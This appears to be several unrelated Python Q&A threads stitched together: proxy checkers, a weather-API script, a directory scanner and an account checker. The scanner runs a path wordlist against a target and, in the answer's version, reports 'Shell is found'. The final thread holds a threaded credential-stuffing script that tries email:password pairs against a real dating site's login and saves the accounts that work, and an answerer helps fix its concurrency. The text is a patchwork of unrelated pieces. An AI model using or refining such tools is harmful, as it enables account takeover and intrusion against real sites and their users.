The code:
for item in pxfile.readlines():
    if is_OK(item):
        sys.stdout.write(item + "is not OK.")
        item = make(item)
        item = "#" + item
        resfile.write(item)
    else:
        sys.stdout.write(item)
        sys.stdout.write("is OK.")
        line = make(item)
        resfile.write(item)
If is_OK returns true it means the proxy doesn't work; I should fix that confusing name.
def is_OK(ip):
    try:
        proxy_handler = urllib2.ProxyHandler({'http': ip})
        opener = urllib2.build_opener(proxy_handler)
        opener.addheaders = [('User-agent', 'Mozilla/5.0')]
        urllib2.install_opener(opener)
        req = urllib2.Request('http://www.icanhazip.com')
        sock = urllib2.urlopen(req)
    except urllib2.HTTPError, e:
        #print 'Error code: ', e.code
        return e.code
    except Exception, detail:
        #print "ERROR:", detail
        return 1
    return 0
It takes 10 minutes to get a list like this:
141.219.252.132:68664
is OK.118.174.0.155:8080
is OK.91.194.246.169:8080
is not OK.91.194.246.81:8080
is OK.201.245.110.138:8888
is OK.202.43.178.31:3128
is OK.202.109.80.106:8080
Is there a way to make it faster?
It's also formatted badly; I tried removing the newline with strip(), but no luck.
Any ideas?
You should use threads to make the code run quicker:
import urllib2, threading

def is_OK(ip):
    print 'Trying %s ...' % ip
    try:
        proxy_handler = urllib2.ProxyHandler({'http': ip})
        opener = urllib2.build_opener(proxy_handler)
        opener.addheaders = [('User-agent', 'Mozilla/5.0')]
        urllib2.install_opener(opener)
        req = urllib2.Request('http://www.icanhazip.com')
        urllib2.urlopen(req)
        print '%s is OK' % ip
    except urllib2.HTTPError:
        print '%s is not OK' % ip
    except Exception:
        print '%s is not OK' % ip
a = threading.Thread(target=is_OK, args=("hostname1",))
a.start()
b = threading.Thread(target=is_OK, args=("hostname2",))
b.start()
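If the proxy list is long, one thread per proxy gets unwieldy; a fixed pool of workers fed from a Queue is the usual pattern. A minimal sketch under that assumption (check_all and num_workers are illustrative names, not from the original; note also that urllib2.install_opener is process-global, so for real concurrency is_OK should call opener.open(req) directly instead of installing the opener):

import Queue
import threading

def worker(q):
    while True:
        ip = q.get()
        if ip is None:  # sentinel value: no more work
            return
        is_OK(ip)       # the check function defined above

def check_all(ips, num_workers=10):
    q = Queue.Queue()
    workers = [threading.Thread(target=worker, args=(q,))
               for _ in xrange(num_workers)]
    for w in workers:
        w.start()
    for ip in ips:
        q.put(ip)
    for _ in xrange(num_workers):
        q.put(None)     # one sentinel per worker so they all exit
    for w in workers:
        w.join()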
First idea: set a shorter timeout than the default one:
timeout = 10
sock = urllib2.urlopen(req, None, timeout)
You may also use threading so you can test several connections simultaneously.
As for the formatting, using strip() this way should work:
for line in pxfile:
    item = line.strip()
    if is_OK(item):
        sys.stdout.write(item + " is not OK.\n")
        resfile.write("# " + make(item) + "\n")
    else:
        sys.stdout.write(item + " is OK.\n")
        resfile.write(make(item) + "\n")
I test my proxies with this script and it reports many of them as working, but when I test the "working" proxies with another proxy checker, only a very small number of them actually work.
Here is the part that checks whether a proxy works:
def process(self, task):
    global alive
    global dead
    global tested
    proxy = task
    log_msg = "Trying HTTP proxy%21s " % proxy
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(cj),
        urllib.request.HTTPRedirectHandler(),
        urllib.request.ProxyHandler({'http': proxy})
    )
    try:
        t1 = time.time()
        response = opener.open(test_url, timeout=timeout_value).read()
        tested += 1
        t2 = time.time()
    except Exception as e:
        log_msg += "%s " % fail_msg
        print(Fore.LIGHTRED_EX + log_msg)
        dead += 1
        tested += 1
        return None
    log_msg += ok_msg + "Response time: %d" % (int((t2 - t1) * 1000))
    print(Fore.LIGHTGREEN_EX + log_msg)
    text_file = open(out_filename, "a")
    text_file.write(proxy + "\r\n")
    text_file.close()
    alive += 1
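One common cause of false positives here is that a bad "proxy" can answer with its own content without relaying the request at all, which still looks like a successful fetch. A hedged sketch of a stricter check in the same Python 3 style (looks_alive is a hypothetical helper and httpbin.org/ip an assumed echo service, neither from the original): count the proxy as alive only if the address echoed back matches the proxy's own IP.

import json
import urllib.request

def looks_alive(proxy, timeout=10):
    # Hypothetical stricter check: fetch an IP-echo service through the
    # proxy and require the echoed address to match the proxy's IP.
    opener = urllib.request.build_opener(
        urllib.request.ProxyHandler({'http': proxy}))
    try:
        raw = opener.open('http://httpbin.org/ip', timeout=timeout).read()
        echoed = json.loads(raw).get('origin', '')
    except Exception:
        return False
    return proxy.split(':')[0] in echoed  # the service may list several IPs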
I am getting the following error with the script. What I want to do is: if I get a correct URL, check with BeautifulSoup whether there is a form with a submit button whose value is "Send".
Traceback (most recent call last):
File "tester.py", line 27, in
if viewstate[0]['value'] == "Send":
IndexError: list index out of range
#!/usr/bin/env python
import urllib2
import sys
import os

url = sys.argv[1]
open_dir_list = open("dirlist.txt", 'r')
dirs = open_dir_list.read().split("\n")
open_dir_list.close()

for dir in dirs:
    uri = url + "/" + dir
    try:
        from BeautifulSoup import BeautifulStoneSoup
        response = urllib2.urlopen(uri)
        if response.getcode() == 200:
            s = uri
            soup = BeautifulStoneSoup(uri)
            viewstate = soup.findAll("input", {"type": "submit"})
            if viewstate[0]['value'] == "Send":
                print("Yay!!!")
            else:
                print("There's nothing here")
    except urllib2.HTTPError, e:
        if e.code == 401:
            print "[!] Authorization Required %s " % (uri)
        elif e.code == 403:
            print "[!] Forbidden %s " % (uri)
        elif e.code == 404:
            print "[-] Not Found %s " % (uri)
        elif e.code == 503:
            print "[!] Service Unavailable %s " % (uri)
        else:
            print "[?] Unknown"

print "\n:. FINISH :.\n"
It works fine with this script, but this one only checks a single given path:
import urllib

f = urllib.urlopen("http://xxx.xxx.xxx.xxx/button.jsp")
s = f.read()
f.close()

from BeautifulSoup import BeautifulStoneSoup
soup = BeautifulStoneSoup(s)
viewstate = soup.findAll("input", {"type": "submit"})
if viewstate[0]['value'] == "Send":
    print(" Yay!!!")
else:
    print("No Submit Button")
Apart from what I mentioned in a comment, you are not passing the returned HTML: you pass uri = url + "/" + dir instead of response.read() to BeautifulSoup, so you are searching for the tag in the uri string, which certainly does not contain any tags. You need to pass the content you read, as below:
response = urllib2.urlopen(uri)
if response.getcode() == 200:
    soup = BeautifulStoneSoup(response.read())
If you want the first match, use .find and check if viewstate to make sure it matched something. You can also iterate over the file object, getting one line at a time:
from BeautifulSoup import BeautifulStoneSoup
import urllib2
import sys

url = sys.argv[1]

with open("dirlist.txt", 'r') as f:
    for dir in f:
        uri = url + "/" + dir.rstrip()
        try:
            response = urllib2.urlopen(uri)
            if response.getcode() == 200:
                soup = BeautifulStoneSoup(response.read())
                viewstate = soup.find("input", {"type": "submit"})
                if viewstate and viewstate.get("value") == "Send":
                    print("Shell is found!! Yay!!!")
                else:
                    print("There's nothing here")
        except urllib2.HTTPError, e:
            if e.code == 401:
                print "[!] Authorization Required %s " % (uri)
            elif e.code == 403:
                print "[!] Forbidden %s " % (uri)
            elif e.code == 404:
                print "[-] Not Found %s " % (uri)
            elif e.code == 503:
                print "[!] Service Unavailable %s " % (uri)
            else:
                print "[?] Unknown"

print "\n:. FINISH :.\n"
I have an interval of 60 and want to print 6 events every minute. But it prints 11, 12, or 13 events randomly every minute. Why is that? Is it because of my code, or what other factors could cause this?
My code is:
import logging
import httplib
import simplejson as json
import socket
import time
import datetime
import urllib2
import sys
import xml.dom.minidom
from bs4 import BeautifulSoup as soup
SCHEME = """<scheme>
    <title>testingCurrentWeatherSG</title>
    <description>Get data from forecast.</description>
    <use_external_validation>true</use_external_validation>
    <streaming_mode>simple</streaming_mode>
    <endpoint>
        <args>
            <arg name="intervalone">
                <title>Intervalone</title>
                <description>How long to refresh this query?</description>
            </arg>
        </args>
    </endpoint>
</scheme>
"""
def do_scheme():
    print SCHEME
## Utility functions

def fahrenheit(fahren):
    return (fahren - 32) * 5.0 / 9.0

def get_percent(num):
    return num * 100.

## Responses

def get_response(conn, url):
    try:
        conn.request('GET', url)
        result = conn.getresponse()
        data = result.read()
        return json.loads(data)
    except socket.timeout:
        return None
## Printing

def print_forecast(name, di):
    # Print the forecast from 'di', for location 'name'
    # name is the name of the location, di is the api response
    psi_avg = 20
    current = di['currently']
    for key, value in sorted(current.iteritems()):
        if key in ['cloudCover', 'icon', 'ozone', 'precipIntensity',  # time
                   'precipProbability', 'precipType', 'pressure', 'summary',
                   'visibility', 'windBearing', 'windSpeed']:
            print '{0} : {1}'.format(key, value)
        elif key in ['temperature', 'dewPoint']:
            print '%s: %.2f' % (key, fahrenheit(value))
        elif key == 'humidity':
            print '%s: %.2f' % (key, get_percent(value))
    print 'psiAverage : ' + str(psi_avg)
    print 'latitude : ' + str(di['latitude'])
    print 'longitude : ' + str(di['longitude'])
    print 'location : ' + str(name)
    print
def weather_Connection(intervalone):
    host = 'api.forecast.io'
    conn = httplib.HTTPSConnection(host, timeout=60)  # adjust timeout as desired
    try:
        urlnyp = '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.37871,103.848808'
        conn.request('GET', urlnyp)
        resultnyp = conn.getresponse()
        contentnyp = resultnyp.read()
    except socket.timeout:
        print 'socket timeout'
        return
    # the locations and urls for the api calls
    urls = {
        'Choa Chu Kang': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.394557,103.746396',
        'Kallang': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.311469,103.871399',
        'Jurong West': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.352008,103.698599',
        'Redhill': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.289732,103.81675',
        'Tampines': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.353092,103.945229',
        'Yishun': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.429463,103.84022',
    }
    responses = {}
    for i, (name, url) in enumerate(sorted(urls.iteritems())):
        response = get_response(conn, url)
        if not response:
            print 'socket timeout on url#%d: %s' % (i, url)
            return
        responses[name] = response
    conn.close()
    # print the forecast
    for name, data in responses.iteritems():
        print_forecast(name, data)
def get_config():
    # Read XML configuration data passed from splunkd on stdin
    config = {}
    try:
        # read everything from stdin
        config_str = sys.stdin.read()
        # parse the config XML
        doc = xml.dom.minidom.parseString(config_str)
        root = doc.documentElement
        conf_node = root.getElementsByTagName("configuration")[0]
        if conf_node:
            logging.debug("XML: found configuration")
            stanza = conf_node.getElementsByTagName("stanza")[0]
            if stanza:
                stanza_name = stanza.getAttribute("name")
                if stanza_name:
                    logging.debug("XML: found stanza " + stanza_name)
                    config["name"] = stanza_name
                    params = stanza.getElementsByTagName("param")
                    for param in params:
                        param_name = param.getAttribute("name")
                        logging.debug("XML: found param '%s'" % param_name)
                        if param_name and param.firstChild and \
                           param.firstChild.nodeType == param.firstChild.TEXT_NODE:
                            data = param.firstChild.data
                            config[param_name] = data
                            logging.debug("XML: '%s' -> '%s'" % (param_name, data))
        if not config:
            raise Exception, "Invalid configuration received from Splunk."
    except Exception, e:
        raise Exception, "Error getting Splunk configuration via STDIN: %s" % str(e)
    return config
def run():
    # The main function that starts the action. The thread will sleep for
    # however many seconds are configured via the input.
    # config = get_config()
    # intervalone = config["intervalone"]
    intervalone = 60
    while True:
        weather_Connection(intervalone)
        logging.info("Sleeping for %s seconds" % (intervalone))
        time.sleep(float(intervalone))

if __name__ == '__main__':
    if len(sys.argv) > 1:
        if sys.argv[1] == "--scheme":
            do_scheme()
    else:
        run()
    sys.exit(0)
I've checked and tried your code and it works fine. Try replacing
logging.info("Sleeping for %s seconds" %(intervalone))
with
print("Sleeping for %s seconds" % (intervalone))
You should see this statement every 6 forecasts.
Note: why return from weather_Connection() here?
for i, (name, url) in enumerate(sorted(urls.iteritems())):
    response = get_response(conn, url)
    if not response:
        print 'socket timeout on url#%d: %s' % (i, url)
        return
    responses[name] = response
You can just skip that location with continue:
for i, (name, url) in enumerate(sorted(urls.iteritems())):
    response = get_response(conn, url)
    if not response:
        print 'socket timeout on url#%d: %s' % (i, url)
        continue
    responses[name] = response
I have a text file containing proxy IPs, which looks like the following:
130.14.29.111:80
130.14.29.120:80
130.159.235.31:80
14.198.198.220:8909
141.105.26.183:8000
160.79.35.27:80
164.77.196.75:80
164.77.196.78:45430
164.77.196.78:80
173.10.134.173:8081
174.132.145.80:80
174.137.152.60:8080
174.137.184.37:8080
174.142.125.161:80
After checking each proxy, I want to mark the list like the following:
total number of '0' = 8
total number of 'x' = 6
percentage = alive 60% , dead 40%
x 130.14.29.111:80
0 130.14.29.120:80
0 130.159.235.31:80
0 14.198.198.220:8909
0 141.105.26.183:8000
0 160.79.35.27:80
x 164.77.196.75:80
x 164.77.196.78:45430
x 164.77.196.78:80
0 173.10.134.173:8081
0 174.132.145.80:80
0 174.137.152.60:8080
x 174.137.184.37:8080
x 174.142.125.161:80
How can this be done with Python? A sample would help; if anyone can help or enlighten me, I'd much appreciate it!
Edit: this is the script source I have. The finished proxy list is saved to 'proxy_alive.txt'; in that file I want to mark whether each proxy element is alive or not.
import socket
import urllib2
import threading
import sys
import Queue

socket.setdefaulttimeout(7)
print "Bobng's proxy checker. Using %s second timeout" % (socket.getdefaulttimeout())

#input_file = sys.argv[1]
#proxy_type = sys.argv[2] #options: http,s4,s5
#output_file = sys.argv[3]
input_file = 'proxylist.txt'
proxy_type = 'http'
output_file = 'proxy_alive.txt'
url = "www.seemyip.com"  # Don't put http:// in here, or any /'s

check_queue = Queue.Queue()
output_queue = Queue.Queue()
threads = 20

def writer(f, rq):
    while True:
        line = rq.get()
        f.write(line + '\n')

def checker(q, oq):
    while True:
        proxy_info = q.get()  # ip:port
        if proxy_info == None:
            print "Finished"
            #quit()
            return
        #print "Checking %s" % proxy_info
        if proxy_type == 'http':
            try:
                listhandle = open("proxylist.txt").read().split('\n')
                for line in listhandle:
                    saveAlive = open("proxy_alive.txt", 'a')
                    details = line.split(':')
                    email = details[0]
                    password = details[1].replace('\n', '')
                    proxy_handler = urllib2.ProxyHandler({'http': proxy_info})
                    opener = urllib2.build_opener(proxy_handler)
                    opener.addheaders = [('User-agent', 'Mozilla/5.0')]
                    urllib2.install_opener(opener)
                    req = urllib2.Request("http://www.google.com")
                    sock = urllib2.urlopen(req, timeout=7)
                    rs = sock.read(1000)
                    if '<title>Google</title>' in rs:
                        oq.put(proxy_info)
                        print '[+] alive proxy', proxy_info
                        saveAlive.write(line)
                        saveAlive.close()
            except urllib2.HTTPError, e:
                print 'url open error? slow?'
                pass
            except Exception, detail:
                print '[-] bad proxy', proxy_info
        else:
            # gotta be socks
            try:
                s = socks.socksocket()
                if proxy_type == "s4":
                    t = socks.PROXY_TYPE_SOCKS4
                else:
                    t = socks.PROXY_TYPE_SOCKS5
                ip, port = proxy_info.split(':')
                s.setproxy(t, ip, int(port))
                s.connect((url, 80))
                oq.put(proxy_info)
                print proxy_info
            except Exception, error:
                print proxy_info

threading.Thread(target=writer, args=(open(output_file, "wb"), output_queue)).start()
for i in xrange(threads):
    threading.Thread(target=checker, args=(check_queue, output_queue)).start()
for line in open(input_file).readlines():
    check_queue.put(line.strip('\n'))
print "File reading done"
for i in xrange(threads):
    check_queue.put(None)
raw_input("PRESS ENTER TO QUIT")
sys.exit(0)
You can use a queue to hold the list of addresses and their meta information.
After you are done checking the IP addresses, you can write the results back to the same file in 'w' mode, e.g. as a list of tuples:
[ (ip-address-1, 'x'), (ip-address-2, '0'), ...... ]
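A minimal sketch of that idea, assuming an is_alive(ip) predicate stands in for your existing check (it is not in your script): read the list, mark each entry '0' (alive) or 'x' (dead), then rewrite the same file with the summary header in your desired format.

def mark_proxies(filename, is_alive):
    # Read the proxy list, skipping blank lines.
    with open(filename) as f:
        proxies = [line.strip() for line in f if line.strip()]

    # Pair every proxy with its mark.
    results = [('0' if is_alive(ip) else 'x', ip) for ip in proxies]
    alive = sum(1 for status, _ in results if status == '0')
    dead = len(results) - alive
    total = len(results) or 1  # guard against an empty file

    # Rewrite the same file: counts, percentages, then the marked list.
    with open(filename, 'w') as f:
        f.write("total number of '0' = %d\n" % alive)
        f.write("total number of 'x' = %d\n" % dead)
        f.write("percentage = alive %d%% , dead %d%%\n"
                % (100 * alive / total, 100 * dead / total))
        for status, ip in results:
            f.write('%s %s\n' % (status, ip))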
Hello all.
I made a Python script with threads that checks whether certain accounts exist on a website.
If I run it with 1 thread it works well, but if I increase the thread count to around 3~5 or above, the results are very different from the 1-thread run; I checked them manually and they were not correct.
I think some of my threading code needs tuning, or should I use the Queue module?
Can anyone advise on or tune my script? Thanks in advance!
# -*- coding: cp949 -*-
import sys, os
import mechanize, urllib
import cookielib
import re
import threading, time
from BeautifulSoup import BeautifulSoup, BeautifulStoneSoup, Tag

# Maximum number of processes to spawn at any one given time.
MAX_PROCS = 5
maillist = "daum.txt"
threads = []
SAVEFILE = 'valid_joyhunt.txt'

# Threading class
class CheckMyThread(threading.Thread):
    llemail = ""
    llpassword = ""

    def __init__(self, lemail, lpassword):
        self.llemail = lemail
        self.llpassword = lpassword
        threading.Thread.__init__(self)

    def run(self):
        valid = []
        llemail = self.llemail
        llpassword = self.llpassword
        try:
            params = urllib.urlencode({'userid': llemail, 'passwd': llpassword})
            rq = mechanize.Request("http://www.joyhunting.com/include/member/login_ok1.asp", params)
            rs = mechanize.urlopen(rq)
            data = rs.read()
            logged_in = r'var _id' in data  # normal login
            if logged_in:
                rq = mechanize.Request("http://www.joyhunting.com/myjoy/new_myjoy.asp")
                rs = mechanize.urlopen(rq)
                maindata = rs.read(50024)
                jun_member = r"준회원"  # "associate member"
                save = open(SAVEFILE, 'a')
                for match in re.finditer(r'<td height="28" colspan="2" style="PADDING-left: 16px">현재 <strong>(.*?)</strong>', maindata):
                    matched = match.group(1)
                    for match2 in re.finditer(r"var _gd(.*?);", data):
                        matched2 = match2.group(1)
                        print '%s, %s' % (matched, matched2)
                        break
                rq1 = mechanize.Request("http://www.joyhunting.com/webchat/applyweb/sendmessage_HPCK_step1.asp?reURL=1&myid=" + llemail + "&ToID=undefined&hide=undefined")
                rs1 = mechanize.urlopen(rq1)
                sendmsg = rs1.read()
                #print sendmsg
                match3 = ''
                for match3 in re.finditer(r":'\+(.*?)\);", sendmsg):
                    matched3 = match3.group(1)
                    #print matched3
                    print 'bad'
                    break
                if match3 == '':
                    save.write('%s, %s, %s:%s ' % (matched, matched2, llemail, llpassword + '\n'))
                    save.close()
                    print '[+] Checking: %s:%s -> Good!' % (llemail, llpassword)
                else:
                    print '[-] Checking: %s:%s -> bad account!' % (llemail, llpassword)
                return 0
        except:
            print '[!] Exception checking %s.' % (llemail)
            return 1
        return 0
try:
    listhandle = open(maillist)
# Bail out if the file doesn't exist
except:
    print '[!] %s does not exist. Please create the file!' % (maillist)
    exit(2)

# Loop through the file
for line in listhandle:
    # Parse the line
    try:
        details = line.split(':')
        email = details[0]
        password = details[1].replace('\n', '')
    # Throw an error and exit.
    except:
        print '[!] Parse Error in %s on line %n.' % (maillist, currline)
        exit

    # Run a while statement:
    if len(threads) < MAX_PROCS:
        # Fork out into another process
        print '[ ] Starting thread to check account %s.' % (email)
        thread = CheckMyThread(email, password)
        thread.start()
        threads.append(thread)
    else:
        # Wait for a thread to exit.
        gonext = 0
        while 1 == 1:
            i = 0
            #print '[ ] Checking for a thread to exit...'
            while i < len(threads):
                #print '[ ] %d' % (i)
                try:
                    if threads[i]:
                        if not threads[i].isAlive():
                            #print '[-] Thread %d is dead' % (i)
                            threads.pop(i)
                            print '[ ] Starting thread to check account %s.' % (email)
                            thread = CheckMyThread(email, password)
                            thread.start()
                            threads.append(thread)
                            gonext = 1
                            break
                        else:
                            #print '[+] Thread %d is still running' % (i)
                            pass
                    else:
                        print '[ ] Crap.'
                except NameError:
                    print '[ ] AWWW COME ON!!!!'
                i = i + 1
            time.sleep(0.050)
            if gonext:
                break
Can you please specify what the different results are? From what I see, the code does much more than verify an account.
From what I see, you're appending to a single file from multiple threads; I'd say that's not thread-safe.
Also, AFAIK mechanize uses shared cookie storage for all requests, so your threads are probably interfering with each other. Use a separate mechanize.Browser() inside run() instead of mechanize.Request(). A sketch of both fixes follows.
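A hedged sketch in your Python 2 / mechanize setup, keeping only the login check (the page parsing is left out): each thread builds its own Browser with a private cookie jar, and a module-level lock serializes writes to the shared results file.

import threading
import cookielib
import urllib
import mechanize

save_lock = threading.Lock()  # one writer to the results file at a time

class CheckMyThread(threading.Thread):
    def __init__(self, lemail, lpassword):
        threading.Thread.__init__(self)
        self.llemail = lemail
        self.llpassword = lpassword

    def run(self):
        # A private Browser and cookie jar per thread, so sessions from
        # different threads cannot clobber each other.
        br = mechanize.Browser()
        br.set_cookiejar(cookielib.CookieJar())
        br.addheaders = [('User-agent', 'Mozilla/5.0')]
        params = urllib.urlencode({'userid': self.llemail,
                                   'passwd': self.llpassword})
        data = br.open("http://www.joyhunting.com/include/member/login_ok1.asp",
                       params).read()
        if r'var _id' in data:  # logged in OK
            with save_lock:
                save = open(SAVEFILE, 'a')
                save.write('%s:%s\n' % (self.llemail, self.llpassword))
                save.close()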